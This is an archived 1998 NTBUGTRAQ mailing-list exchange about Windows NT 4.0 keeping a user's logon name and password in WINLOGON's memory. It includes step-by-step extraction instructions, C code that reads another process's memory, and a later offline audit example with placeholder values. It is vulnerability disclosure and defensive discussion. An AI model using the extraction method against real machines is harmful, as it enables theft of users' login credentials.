FW: Win NT 4.0 UserId and Password available in memory

  • To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  • Subject: FW: Win NT 4.0 UserId and Password available in memory
  • From: Raphael Barber <RaphaelBFCCTI.CO.UK>
  • Date: Fri, 4 Dec 1998 15:19:41 -0000
  • Approved-By: Russ.Cooper@RC.ON.CA
  • Reply-To: Raphael Barber <RaphaelBFCCTI.CO.UK>
  • Sender: Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>

Oooops.
Meant to post to the list...

> -----Original Message-----
> From: Raphael Barber
> Sent: Thursday, December 03, 1998 1:43 PM
> To:   'russell.osterlund@ZURICH.COM'
> Subject:      RE: Win NT 4.0 UserId and Password available in memory
>
>       I've tried this but couldn't find anything that looks like what you
>       describe... this is what I got:
>
>       Dumping Memory for Process ID 34, 4096 bytes starting at address
>       0x10000 (4096 requested)
>
>       0x00000000  C.O.M.P.U.T.E.R.N.A.M.E.=.R.A.P.
>       0x00000020  H.A.E.L...C.o.m.S.p.e.c.=.C.:.\.
>       0x00000040  W.I.N.N.T.\.s.y.s.t.e.m.3.2.\.c.
>       0x00000060  m.d...e.x.e...L.O.G.O.N.S.E.R.V.
>       0x00000080  E.R.=.\.\.R.A.P.H.A.E.L...N.U.M.
>       0x000000A0  B.E.R._.O.F._.P.R.O.C.E.S.S.O.R.
>       0x000000C0  S.=.1...O.S.=.W.i.n.d.o.w.s._.N.
>       0x000000E0  T...O.s.2.L.i.b.P.a.t.h.=.C.:.\.
>       0x00000100  W.I.N.N.T.\.s.y.s.t.e.m.3.2.\.o.
>       0x00000120  s.2.\.d.l.l.;...P.a.t.h.=.C.:.\.
>       0x00000140  W.I.N.N.T.\.s.y.s.t.e.m.3.2.;.C.
>       0x00000160  :.\.W.I.N.N.T...P.R.O.C.E.S.S.O.
>       0x00000180  R._.A.R.C.H.I.T.E.C.T.U.R.E.=.x.
>       0x000001A0  8.6...P.R.O.C.E.S.S.O.R._.I.D.E.
>       0x000001C0  N.T.I.F.I.E.R.=.x.8.6...F.a.m.i.
>       0x000001E0  l.y...5...M.o.d.e.l...4...S.t.e.
>       0x00000200  p.p.i.n.g...4.,...G.e.n.u.i.n.e.
>       0x00000220  I.n.t.e.l...P.R.O.C.E.S.S.O.R._.
>       0x00000240  L.E.V.E.L.=.5...P.R.O.C.E.S.S.O.
>       0x00000260  R._.R.E.V.I.S.I.O.N.=.0.4.0.4...
>       0x00000280  S.y.s.t.e.m.D.r.i.v.e.=.C.:...S.
>       0x000002A0  y.s.t.e.m.R.o.o.t.=.C.:.\.W.I.N.
>       0x000002C0  N.T...U.S.E.R.P.R.O.F.I.L.E.=.C.
>       0x000002E0  :.\.W.I.N.N.T.\.P.r.o.f.i.l.e.s.
>       0x00000300  \.r.a.p.h.a.e.l...w.i.n.d.i.r.=.
>       0x00000320  C.:.\.W.I.N.N.T.....N.N.T.......
>       0x00000340  ................................
>       0x00000360  ................................
>       0x00000380  ................................
>       0x000003A0  ................................
>
>       using the following code (FTWCR)
>
>       #include <windows.h>
>       #include <stdio.h>
>       #include <ctype.h>
>
>       // Dump 'size' bytes of process 'id' starting at 'base', 32 bytes per row.
>       void DumpProcessMemory(DWORD id, DWORD base, DWORD size)
>       {
>               HANDLE hProcess=OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ,TRUE,id);
>               if(hProcess)
>               {
>                       void* lpBaseAddress=(void*)base;
>                       BYTE* lpBuffer=new BYTE[size];
>                       DWORD dwNumberOfBytesRead=0;
>                       if(ReadProcessMemory(hProcess,lpBaseAddress,lpBuffer,size,&dwNumberOfBytesRead))
>                       {
>                               printf("Dumping Memory for Process ID %lu, %lu bytes starting at address 0x%lX (%lu requested)\n",
>                                      id,dwNumberOfBytesRead,base,size);
>                               for(DWORD n=0;n<dwNumberOfBytesRead;n++)
>                               {
>                                       if(n%32==0)     printf("\n0x%08lX ",n);
>                                       // NUL bytes print as '_', other non-printable bytes as '.'
>                                       // (the NUL test must come first, since isgraph('\0') is false)
>                                       printf("%c",lpBuffer[n]=='\0'?'_':(isgraph(lpBuffer[n])?lpBuffer[n]:'.'));
>                               }
>                               printf("\n");
>                       }
>                       else
>                               printf("Error %lu.\n",GetLastError());
>                       delete [] lpBuffer;
>                       CloseHandle(hProcess);
>               }
>               else
>                       printf("OpenProcess failed, error %lu.\n",GetLastError());
>       }
>
>       there's no more readable text in the rest of the page, and I
> couldn't read beyond that....
>
>       This was a very quick check, so I'm sure I've overlooked
> something.... could you give more details of your test?
>
>       Raphael
>
>
>       Russ wrote:
>
>       I have "stumbled upon" something peculiar concerning Windows NT 4.0
>       Workstation security. It seems that the userid and password remain
>       in memory after a user has successfully logged on. Specifically, the
>       memory space associated with WINLOGON.EXE (the memory block
>       containing the environment space) contains the values
>       "lMprNotifyUserName=xxxx" and "lMprNotifyPassword=yyyy", where
>       "xxxx" is the userid used to issue the logon to the workstation and
>       "yyyy" is the password.
>
>       Is this widely known? It seems that basic security on a workstation
>       has been compromised by this behavior.
>
>       The algorithm used to discover the password and userid is the
>       following:
>
>       1) Locate and determine WINLOGON's process id.
>       2) Open up this process for PROCESS_QUERY_INFORMATION and
>          PROCESS_VM_READ access.
>       3) Issue a ReadProcessMemory on the address 0x00010000 for one page.
>       4) Scan the copied memory area for the strings "lMprNotifyPassword="
>          and "lMprNotifyUserName" and display what comes after.
>
>       Thank you in advance for your interest.
>
>       Russ Osterlund
>
>
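The dump Raphael posted shows the environment block stored as UTF-16LE (every character is followed by a NUL byte), and Russ's step 4 searches that copied page for two variable names. The following is an added audit example, written here for this page and not code from either poster: it builds a constructed environment block in that layout (NAME=VALUE entries, each ended by a wide NUL, block ended by a second wide NUL), shows that a byte-wise ASCII search never matches the wide form, and walks the block entry by entry to report which of the two credential-bearing names are present without echoing their values. The sample values are placeholders, not real credentials, and the program runs offline on any platform; reading a live process is deliberately left out.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* The two variable names Russ reports seeing in WINLOGON's environment block. */
static const char *const SENSITIVE_NAMES[] = {
    "lMprNotifyUserName", "lMprNotifyPassword"
};

/* Append an ASCII string as UTF-16LE (char, 0x00) plus a wide NUL terminator.
 * Returns the new length, or 0 if 'cap' is too small. */
static size_t wide_append(uint8_t *out, size_t len, size_t cap, const char *s)
{
    size_t need = (strlen(s) + 1) * 2;
    if (cap - len < need) return 0;
    for (; *s; ++s) { out[len++] = (uint8_t)*s; out[len++] = 0; }
    out[len++] = 0; out[len++] = 0;
    return len;
}

/* Build a UTF-16LE environment block from NAME=VALUE strings, closed by a
 * second wide NUL, the layout seen in the dump above. Returns 0 on overflow. */
size_t build_env_block(const char *const *vars, size_t n, uint8_t *out, size_t cap)
{
    size_t len = 0;
    for (size_t i = 0; i < n; ++i) {
        len = wide_append(out, len, cap, vars[i]);
        if (len == 0) return 0;
    }
    if (cap - len < 2) return 0;
    out[len++] = 0; out[len++] = 0;
    return len;
}

/* Constructed sample block (placeholder values, not real credentials). */
size_t sample_block(uint8_t *out, size_t cap)
{
    static const char *const vars[] = {
        "COMPUTERNAME=RAPHAEL",
        "ComSpec=C:\\WINNT\\system32\\cmd.exe",
        "lMprNotifyUserName=<placeholder-user>",
        "lMprNotifyPassword=<placeholder-password>",
        "windir=C:\\WINNT"
    };
    return build_env_block(vars, sizeof vars / sizeof *vars, out, cap);
}

/* Byte-wise ASCII search: byte offset of the needle or -1.
 * Included to show that it never matches UTF-16LE data. */
long scan_narrow(const uint8_t *buf, size_t len, const char *needle)
{
    size_t n = strlen(needle);
    for (size_t i = 0; i + n <= len; ++i)
        if (memcmp(buf + i, needle, n) == 0) return (long)i;
    return -1;
}

/* Search for an ASCII needle stored as UTF-16LE: byte offset or -1. */
long scan_wide(const uint8_t *buf, size_t len, const char *needle)
{
    size_t n = strlen(needle);
    for (size_t i = 0; i + 2 * n <= len; ++i) {
        size_t k;
        for (k = 0; k < n; ++k)
            if (buf[i + 2 * k] != (uint8_t)needle[k] || buf[i + 2 * k + 1] != 0) break;
        if (k == n) return (long)i;
    }
    return -1;
}

/* Walk the block entry by entry and count entries whose NAME (text before '=')
 * is one of SENSITIVE_NAMES. Matching names are written to 'report'
 * (comma-separated); the values themselves are never copied out. */
int audit_env_block(const uint8_t *buf, size_t len, char *report, size_t cap)
{
    int hits = 0;
    size_t i = 0;
    if (cap) report[0] = '\0';
    while (i + 1 < len && !(buf[i] == 0 && buf[i + 1] == 0)) {
        char name[64];
        size_t nlen = 0, j = i;
        /* decode the name up to '='; a non-ASCII code unit ends the name early */
        while (j + 1 < len && !(buf[j] == 0 && buf[j + 1] == 0)) {
            if (buf[j + 1] != 0 || buf[j] == '=') break;
            if (nlen + 1 < sizeof name) name[nlen++] = (char)buf[j];
            j += 2;
        }
        name[nlen] = '\0';
        /* skip the rest of this entry and its terminating wide NUL */
        while (j + 1 < len && !(buf[j] == 0 && buf[j + 1] == 0)) j += 2;
        i = j + 2;
        for (size_t s = 0; s < sizeof SENSITIVE_NAMES / sizeof *SENSITIVE_NAMES; ++s) {
            if (strcmp(name, SENSITIVE_NAMES[s]) != 0) continue;
            ++hits;
            if (cap) {
                if (report[0]) strncat(report, ",", cap - strlen(report) - 1);
                strncat(report, name, cap - strlen(report) - 1);
            }
        }
    }
    return hits;
}

int main(void)
{
    uint8_t block[512];
    char report[128];
    size_t len = sample_block(block, sizeof block);
    int hits = audit_env_block(block, len, report, sizeof report);
    printf("ASCII search for lMprNotifyPassword=: %ld (never matches wide data)\n",
           scan_narrow(block, len, "lMprNotifyPassword="));
    printf("UTF-16LE search: byte offset %ld\n", scan_wide(block, len, "lMprNotifyPassword="));
    printf("credential-bearing variables present: %d [%s]\n", hits, report);
    return hits ? 1 : 0;
}
```

The audit returns a non-zero exit status when either name is present, so it can be dropped into a script that checks a saved block; only the names are reported, never the values that follow them.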